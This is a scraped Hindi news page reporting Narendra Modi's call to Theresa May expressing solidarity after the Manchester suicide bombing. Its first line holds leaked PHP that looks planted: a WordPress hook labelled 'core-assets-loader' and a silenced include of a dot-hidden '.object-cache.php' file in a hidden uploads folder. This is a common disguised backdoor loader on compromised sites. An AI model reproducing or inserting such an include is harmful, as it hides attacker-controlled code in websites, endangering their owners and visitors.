add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ब्रिटेन की पीएम से बोले मोदी, ‘आतंकवाद के खिलाफ हम साथ खड़े हैं – SOCH INDIA
Menu

दुनिया
ब्रिटेन की पीएम से बोले मोदी, ‘आतंकवाद के खिलाफ हम साथ खड़े हैं

nobanner

पीएम मोदी ने ब्रिटिश प्रधानमंत्री टेरीजा मे को फोन कर मैनचेस्टर आत्मघाती हमले को लेकर गहरा दुख प्रकट किया और कहा कि आतंकवाद के खिलाफ भारत ब्रिटेन के साथ खड़ा है. मोदी ने बुधवार को ब्रिटिश प्रधानमंत्री को फोन किया जिस दौरान दोनों ने आतंकवाद विरोधी प्रयासों और आनॅलाइन चरमपंथ का मुकाबला करने को लेकर सहयोग जारी करने पर सहमति जताई.

मोदी ने ट्वीट किया, ‘‘मैनचेस्टर हमले के बाद ब्रिटेन के साथ एकजुटता प्रकट करने के लिए प्रधानमंत्री टेरीजा मे को फोन किया’’ डाउनिंग स्ट्रीट ने एक बयान में कहा, ‘‘प्रधानमंत्री नरेंद्र मोदी ने अपने देश की तरफ से गहरा शोक प्रकट किया और कहा कि भारत की संवेदनाएं सभी प्रभावित लोगों के साथ हैं. आतंकवाद के खिलाफ हम साथ खड़े हैं.’’ उसके मुताबिक मैनचेस्टर के लोगों ने जो साहस, धर्य और सद्भावना दिखाई है उसके लिए प्रधानमंत्री मोदी ने उनको बधाई दी.

प्रधानमंत्री मोदी के अलावा जर्मनी की चांसलर एंजेला मर्केल, सउदी अरब के शाह सलमान और स्वीडन के प्रधानमंत्री स्टीफन लोफवेन ने भी टेरीजा को फोन कर बीते सोमवार को हुए आतंकी हमले पर दुख प्रकट किया.